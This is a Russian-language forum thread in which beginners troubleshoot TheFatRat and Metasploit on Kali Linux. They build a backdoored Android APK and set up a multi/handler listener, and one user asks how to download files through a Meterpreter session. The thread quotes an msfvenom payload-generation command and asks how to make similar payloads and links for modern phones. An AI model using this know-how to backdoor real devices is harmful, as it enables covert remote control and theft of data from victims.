Помогите разобраться пожалуйста kali linux metasploit

[CrazyMan]

Всем доброго времени суток. Помогите разобраться пожалуйста. На VirtualBox установлена Kali linux 2020.2 (всё с официальных сайтов)
Хотел протестить свой телефон при помощи FatRat вроде бы всё делал по прочитанной инструкции. но на выходе всегда одна и тажа ошибка связанная с Metasploit (скрины прилагаются) Вопрос: что я делаю не так? Где ошибка?
Нужно ли настраивать саму "машину" при этом если да то как? И такой вопрос нужно ли пользоваться VPN? если не обязательно, то какой мне порт прописывать? Помогите один раз грамотно разобраться пожалуйста...

 

[BearSec]

Что мне нужно сделать для того чтоб всё перенести?
(как правильно это сделать)
И как сделать чтоб был английский а не русский?
И что дальше?

Выполни команды

cd 'Рабочий стол'
mv ./TheFatRat ../
cd ../TheFatRat
sudo ./fatrat

Таким образом ты перенесёшь директорию TheFatRat в /home/adminus и мы исключим воздействие кириллицы и пробелов при исполении скрипта.

Если не поможет, будем капать дальше

 

[InetTester]

Могу зайти как root пробовал запускать fatrat не всё тоже самое
Антивирус работает
я не знаю как показать строку 2238 которую ты попросил

Ненужно, глянул уже на git-e, вообщем попробуй отключить антиврус и запустить от рута... лучше перед эти для чистоты эксперимента перезагрузись)
Насколько я понял после работы msfvenom весь его stdout кидается в файлик логов.. и вот этот файл не получается создать/открыть/найти

$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1

 

[CrazyMan]

Выполни команды

cd 'Рабочий стол'
mv ./TheFatRat ../
cd ../TheFatRat
sudo ./fatrat

Таким образом ты перенесёшь директорию TheFatRat в /home/adminus и мы исключим воздействие кириллицы и пробелов при исполении скрипта.

Если не поможет, будем капать дальше

сейчас всё попробую. спасибо. отпишусь сразу

 

[CrazyMan]

Ненужно, глянул уже на git-e, вообщем попробуй отключить антиврус и запустить от рута... лучше перед эти для чистоты эксперимента перезагрузись)
Насколько я понял после работы msfvenom весь его stdout кидается в файлик логов.. и вот этот файл не получается создать/открыть/найти

$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1

спасибо сейчас попробую первый вариант и потом твой если не получиться

 

[BearSec]

Ненужно, глянул уже на git-e, вообщем попробуй отключить антиврус и запустить от рута... лучше перед эти для чистоты эксперимента перезагрузись)
Насколько я понял после работы msfvenom весь его stdout кидается в файлик логов.. и вот этот файл не получается создать/открыть/найти

$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1

Да, в скрипте на 156 строке указано куда логи будут грузиться
log="${path}/logs/apk-old.log"

 

[CrazyMan]

Выполни команды

cd 'Рабочий стол'
mv ./TheFatRat ../
cd ../TheFatRat
sudo ./fatrat

Таким образом ты перенесёшь директорию TheFatRat в /home/adminus и мы исключим воздействие кириллицы и пробелов при исполении скрипта.

Если не поможет, будем капать дальше

я перенес вс как ты написал. вот что теперь запускается

 

[BearSec]

я перенес вс как ты написал. вот что теперь запускается

Выполни sudo ./setup.sh

 

[CrazyMan]

Выполни sudo ./setup.sh

я всё решил сразу делать из под root
сейчас посмотрим что получиться и я отпишусь

 

[CrazyMan]

Рубят всё получилось спасибо большое. apk создал на свой телефон бросил, только вот у меня телефон оказался умнее и сразу распознал вирус)))
всё равно установил и появился значок приложения вот только опять же телефон написал что данное приложение создано для более старых моделей и у Вас работать будет с перебоями. так и вышло. соответственно и сессию я запустить тоже не смог(((
А где мне научиться создавать такие apk файл скажем современные))))
для современных телефонов.

 

[BearSec]

Рубят всё получилось спасибо большое. apk создал на свой телефон бросил, только вот у меня телефон оказался умнее и сразу распознал вирус)))
всё равно установил и появился значок приложения вот только опять же телефон написал что данное приложение создано для более старых моделей и у Вас работать будет с перебоями. так и вышло. соответственно и сессию я запустить тоже не смог(((
А где мне научиться создавать такие apk файл скажем современные))))
для современных телефонов.

В итоге твой вопрос решился переносом всей директории в /home, установки недостающих модулей и запуска от root?

На счёт работать с перебоями не факт.
Ты запустил в metasploit слушателя?
И есть ли у тебя связь между телефоном и твоей машиной?

 

[CrazyMan]

В итоге твой вопрос решился переносом всей директории в /home, установки недостающих модулей и запуска от root?

На счёт работать с перебоями не факт.
Ты запустил в metasploit слушателя?
И есть ли у тебя связь между телефоном и твоей машиной?

ну смотри само приложение на телефон установил но оно не как не активно. просто ярлык который пустой и не открывается))))
Ты запустил в metasploit слушателя? Да но сессия то не рабочая так как на телефоне приложения я не запускаю (не могу)
А вот третий вопрос я твой не понял на счёт связи(((((((
то что я сделал apk я уже этому очень рад.

как бы мне теперь научиться на таком же примере с этим же смыслом ссылки делать?

 

[CrazyMan]

В итоге твой вопрос решился переносом всей директории в /home, установки недостающих модулей и запуска от root?

На счёт работать с перебоями не факт.
Ты запустил в metasploit слушателя?
И есть ли у тебя связь между телефоном и твоей машиной?

В итоге твой вопрос решился переносом всей директории в /home, установки недостающих модулей и запуска от root?
Да БЛАГОДАРЯ ВАМ!!!

 

[CrazyMan]

В итоге твой вопрос решился переносом всей директории в /home, установки недостающих модулей и запуска от root?

На счёт работать с перебоями не факт.
Ты запустил в metasploit слушателя?
И есть ли у тебя связь между телефоном и твоей машиной?

Помоги мне пожалуйста с вот этим

Enable HTTP request and response logging with set HttpTrace true
как мне включить эти журналы?(

 

[BearSec]

На твоей машине надо запустить метаслоит, выбрать тот же пейлоад, настроить multi handler и указать тот же порт, что ты использовал при создании apk.
Далее тебе нужно убедится, что между твоим телефоном и машиной с запущенным метасплоитом есть линк (самое простое дляттестов - они должны находится в одной сети). Иначе программа не сможет установить связь с метасплоитом.

Судя по твоим вопросам ты только начинаешь разбираться с метасплоитом, да и в линуксе опыта работы у тебя нет.

Начни с базовых навыков, разберись как работать в терминале линукса, как работают сети.
Потом переходи к тестам на виртуалках. Подними виртуалку с Kali и с Windows и на них изучай как работают пейлоады, какие типы соединений бывают и прочее.

Читай и смотри ролики на английском, там зачастую все стандартные вопросы и ошибки уже решены и объяснены.

Ну и Kali ставь сразу английскую, как ты заметил косяки с кириллицей бывают очень часто.

На твой последний вопрос ответить не могу. Понятие не имею откуда ты взял эти параметры и как их настраивать. Закрывай эту тему (выбери пост который решил твою проблему) и открывай новую. Главное сразу указывай все шаги, которые приводят тебя к проблеме, иначе тратится куча времени на вытягивание недостающей информации.

 

[miha555]

Всем привет! создал backdoor на виртульную машину .. показывает спиок файлов, делайт скриншоты...но как скачивать файлы ??? при вводе cp ....
stdapi_fs_file_copy: Operation failed: Access is denied.

 

[BearSec]

Всем привет! создал backdoor на виртульную машину .. показывает спиок файлов, делайт скриншоты...но как скачивать файлы ??? при вводе cp ....
stdapi_fs_file_copy: Operation failed: Access is denied.

cp команда копирования, которая будет выполняется на атакуемой машине.
Для скачивания есть команда download
Воь прекрасная статья каа работает метерпретер, да и вообще о работе метасплоита от разработчиков метасплоита

Ссылка скрыта от гостей

Ну и на будущее лучше создавать отдельную тему под свою проблему